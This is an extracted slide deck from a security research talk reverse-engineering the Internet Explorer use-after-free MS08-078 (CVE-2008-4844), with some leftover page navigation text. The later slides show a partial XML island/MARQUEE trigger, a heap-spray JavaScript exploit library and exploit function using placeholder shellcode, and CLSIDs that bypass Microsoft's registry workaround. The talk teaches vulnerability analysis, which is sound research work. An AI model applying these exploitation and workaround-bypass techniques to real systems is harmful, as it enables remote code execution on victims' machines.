A client-side vulnerability under the microscope!

A client-side vulnerability
under the microscope!
Nelson Brito
Security Research Enthusiast

Agenda
Motivation
Inception
Dream Level 1
Dream Level 2
Dream Level 3
Kick or Limbo
Questions
“if(time) BONUS();”

Misinformation
Many presentations have been done in Brazil, regarding reverse engineer, as
well as too much useless information:
Mostly related to purpose-built frameworks, tools and libraries.
Some others addressing how to translate to a readable format.
Leaving the apprentices in a “black hole”, with tons of misinformation.
I call this deception.
The community demands much more than simple “hello world” bugs.
Since you have created the bug, you can exploit it easily.

Inception
“The most resilient parasite is an
idea planted in the unconscious
mind...”

Reverse Engineer
Every time a new vulnerability comes out, we should be ready to understand
it, in order to perform: Exploitation, Detection, Prevention and Mitigation.
Sometimes, none or just a few information regarding a new vulnerability is
publicly available.
Sometimes, these information regarding a new vulnerability are wrong or, to
be polite, uncompleted.
Reverse engineer is one of the most powerful approaches available to deeply
understand a new vulnerability, and, sometimes, to rediscover (?) the new
vulnerability.

Design the dream levels

vulnerability

vulnerable

exploitation

ecosystem

prevention

arbitrary code
attack prevention

Kick or Limbo Dream Level 3 Dream Level 2 Dream Level 1

Design the dream levels
vulnerability

speciﬁcation
documentation

vulnerable
ecosystem

black box

knowledge
base

code review

white box

knowledge

reverse engineer

black box

base

knowledge

exploitation

base

prevention

arbitrary code
attack prevention

Dream Level 1
Preparing the vulnerable
ecosystem...

Checklist
Has a vulnerability been chosen?
There is nothing to do without a vulnerability.
Are there valuable information about the vulnerability?
Gather valuable information to understand the weakness type regarding the vulnerability, as well as
any feature and/or technology surrounding to trigger the vulnerability.
Is the vulnerable ecosystem affordable?
Avoid exotic vulnerable ecosystem, because it must be conﬁgured as a test-bed and its deep
knowledge are “sine qua non”.
Are there public tools available to perform a reverse engineer?
A good set of public tools will deﬁne the success of the reverse engineer – development skills are
always necessary, otherwise the reverse engineer will fail.
Which analysis method should be applied?
Choose and understand the analysis method that will be applied.

Valuable information
MS08-078:
CVE-2008-4844.
CWE-367 – TOCTOU Race Condition.
CVSS – 9.3 (HIGH).
Affected systems:
Microsoft Internet Explorer 5.01 SP4, 6 SP 0/1, 7 and 8 Beta 1/2.
Microsoft Windows XP SP 1/2/3, Vista SP 0/1/2, Server 2003 SP 0/1/2
and Server 2008 SP 0/1/2.

Public tools
Debugging T
ools for Windows:
It is a set of extensible tools for debugging device drivers for the Microsoft
Windows family of operating systems.
It supports debugging of:
Applications, services, drivers, and the Windows kernel.
Native 32-bit x86, native Intel Itanium, and native x64 platforms.
Microsoft Windows NT 4, 2000, XP, Vista, Server 2003 and Server 2008.
User-mode programs and kernel-mode programs.
Live targets and dump ﬁles.
Local and remote targets.
The IDA (Interactive DisAssembler) Pro 5.0 Freeware is also recommended.

Analysis methods
White box:
Also known as Static Code Analysis, and it looks at applications in
non-runtime environment.
Black Box:
Also known as Dynamic Code Analysis, and it looks at applications in
runtime environment.
Grey/Gray Box:
It is a mix of White Box and Black Box.

Checklist
Has a vulnerability been chosen?
MS08-078 (CVE-2008-4844).
Are there valuable information about the vulnerability?
Keywords: “XML Island”, “Data Binding”, “use-after-free”, “MSHTML.dll”, “XML document”,
“<SPAN>”, “nested”.
Is the vulnerable ecosystem affordable?
Microsoft Internet Explorer 7 and Microsoft Windows XP SP3
Are there public tools available to perform a reverse engineer?
Debugging T
ools for Windows, Windows Symbol Package for Windows XP SP3 and IDA Pro 5.0
Freeware Version.
Which analysis method should be applied?
White Box, Black Box and Grey/Gray Box.

Dream Level 2
Gathering valuable information of
vulnerability...

XML island
XML Data Island:
XML document that exists within an HTML page.
Allows to script against the XML document:
Without having to load the XML document through script or through
the HTML <OBJECT> element.
XML Data Island can be embedded using one of the following methods:
HTML <XML> element.
HTML <SCRIPT> element.

Data binding
Data Source Object (DSO):
T bind data to the elements of an HTML page in Microsoft Internet
o
Explorer, a DSO must be present on that page.
Data Consumers:
Data consumers are elements on the HTML page that are capable of
rendering the data supplied by a DSO.
Binding Agent and T
able Repetition Agent:
The binding and repetition agents are implemented by MSHTML.dll,
the HTML viewer for Microsoft Internet Explorer, and they work
completely behind the scenes.

Use-after-free
Referencing memory after it has been freed can cause a program to crash,
use unexpected values, or execute code.
The use of previously-freed memory can have any number of adverse
consequences, ranging from the corruption of valid data to the execution of
arbitrary code.
Use-after-free errors have two common and sometimes overlapping causes:
Error conditions and other exceptional circumstances.
Confusion over which part of the program is responsible for freeing the
memory.
Brieﬂy, an use-after-free vulnerability can lead to execute arbitrary code.

Microsoft® HTML Viewer
MSHTML.dll is at the heart of Internet Explorer and takes care of its HTML
and Cascading Style Sheets (CSS) parsing and rendering functionality.

MSHTML.dll exposes interfaces that enable you to host it as an active
document.

MSHTML.dll may be called upon to host other components depending on the
HTML document's content, such as:
Scripting Engines:
Microsoft Java Scripting (JScript).
Visual Basic Scripting (VBScript).
ActiveX Controls.
XML Data.

XML document
Deﬁned by W3C:
“Extensible Markup Language (XML) 1.0 (Fifth Edition)” (November
28th, 2008).
XML elements must follow some basic name rules:
Names can contain letters, numbers, and other characters.
Names must not start with a number or punctuation character.
Names must not start with the letters xml (or XML, or Xml, etc).
Names cannot contain spaces.
There are only ﬁve built-in character entities for XML:
“<”, “>”, “&”, “”” and “’”.

Dream Level 3
Analyzing the vulnerability...

T
riggering
First clue about this trigger came from Microsoft Security Development
Lifecycle (SDL):

“T
riggering the bug would require a fuzzing tool that builds data streams

with multiple data binding constructs with the same identiﬁer.”, “Random
(or dumb) fuzzing payloads of this data type would probably not

trigger the bug, however.”, “When data binding is used, IE creates an
object which contains an array of data binding objects.”

It might mean that one – or more – of the following objects must be nested to

be “allocated” and “released”: XML Data Island, Data Source Object (DSO)
and/or Data Consumers.
Nested means:
<{Element}><{Element}></{Element}></{Element}>

Mapping
The first contact is the most important reverse engineer step.
It will define all the next steps the reverse engineer will follow in order to
acquire knowledge about the vulnerability.
Remember:
“It’s the first impression that stays on!”
The first contact (impression) will lead all the rest of reverse engineer , no
matter what is done after – pay attention.
Ensure to load the Windows symbol files, in order to understand the
vulnerability – it will be very helpful to map the object classes, properties
and/or methods.

A client-side vulnerability under the microscope!

esi = ((dword ptr [edi+8]) >> 2) - 1;
ebx = 0;

!
do{
eax = dword ptr [edi+12];
ecx = dword ptr [eax+ebx*4];
if(!(ecx)) break;
ecx->mshtml!CXfer::T
ransferFromSrc();
...
ebx++;
}while(ebx <= esi);

Kick or Limbo
Exploiting the vulnerability...

<XML ID=I><X><C>
<IMG SRC= “javascript:
</C></X></XML>
</MARQUEE>
</MARQUEE>

mshtml!CXfer::T
ransferFromSrc+0x38

EIP = DWORD PTR [ECX+84h] {ECX+84h = 0A0A0A0Ah}

Heap-spraying
Wikipedia description:
“In computer security, heap spraying is a technique used in exploits to
facilitate arbitrary code execution.”
“In general, code that sprays the heap attempts to put a certain
sequence of bytes at a predetermined location in the memory of a
target process by having it allocate (large) blocks on the process' heap
and ﬁll the bytes in these blocks with the right values.”
A JavaScript library has been created to optimize the exploitation – inspired
on:
JavaScript Heap Exploitation library by Alexander Sotirov.

var obj = new Exploit();
obj.address(address,format)
obj.ascii(method,format,size)
obj.banner(memory)
obj.check(address,shellcode,memory)
obj.chunk1mb(block64k)
obj.chunk64k(address,shellcode)

!
!
!
!
!
!
!
!
!

!
!
!
!
!
!
!
!
obj.even(shellcode)
obj.heap(block1mb,memory)
obj.hexa(address,size)
obj.memory(address)
obj.random(maximum)
obj.shellcode(shellcode,format)
obj.spray(address,shellcode,memory)

function Inception (){
var ms08_078 = new Exploit();
var choice, memory, address, shellcode, trigger = new String();
ms08_078.offset = [0x0a0a0a0a]; ms08_078.code[1] = “cc cc cc cc”;
choice = ms08_078.random(ms08_078.offset.length);
memory = ms08_078.memory(ms08_078.offset[choice]);
address = ms08_078.address(ms08_078.offset[choice], 0);
shellcode = ms08_078.shellcode(ms08_078.code[1], 0);
trigger = trigger.concat(“<XML ID=I><X><C>...”);
...
if(ms08_078.spray(address, shellcode, memory))
document.getElementById(“b00m”).innerHTML = trigger;
}

Questions
Questions and answers...

BONUS
There is much more ground to be
covered...

Disable XML island functionality
Create a backup copy of the registry keys by using the following command
from an elevated command prompt:
...
Next, save the following to a ﬁle with a .REG extension, such as
Disable_XML_Island.reg:
Windows Registry Editor Version 5.00
[ - H K E Y _ C L A S S E S _ RO OT C L S I D { 3 7 9 E 5 0 1 F- B 2 3 1 - 1 1 D 1 ADC1-00805FC752D8}]
Run Disable_XML_Island.reg with the following command from an elevated
command prompt:
Regedit.exe /s Disable_XML_Island.reg

Bypassing workaround
XML Data Source Object 1.0
550DDA30-0541-11D2-9CA9-0060B0EC3D39
XML Data Source Object 3.0
F5078F39-C551-11D3-89B9-0000F81FE221
F6D90F14-9C73-11D3-B32E-00C04F990BB4
T
abular Data Control
333C7BC4-460F-11D0-BC04-0080C7055A83

CVE description
Previous CVE-2008-4844 description:
Use-after-free vulnerability in mshtml.dll in Microsoft Internet Explorer 5.01,
6, and 7 on Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold
and SP1, and Server 2008 allows remote attackers to execute arbitrary code
via a crafted XML document containing nested SPAN elements, as exploited
in the wild in December 2008.
Current CVE-2008-4844 description:
Use-after-free vulnerability in the CRecordInstance::T
ransferT
oDestination
function in mshtml.dll in Microsoft Internet Explorer 5.01, 6, 6 SP1, and 7
allows remote attackers to execute arbitrary code via DSO bindings
involving (1) an XML Island, (2) XML DSOs, or (3) T
abular Data Control
(TDC) in a crafted HTML or XML document, as demonstrated by nested
SPAN or MARQUEE elements, and exploited in the wild in December 2008.

A client-side vulnerability under the microscope!

More Related Content

What's hot (19)

Viewers also liked (20)

Similar to A client-side vulnerability under the microscope! (20)

More from Nelson Brito (7)

Recently uploaded (20)

A client-side vulnerability under the microscope!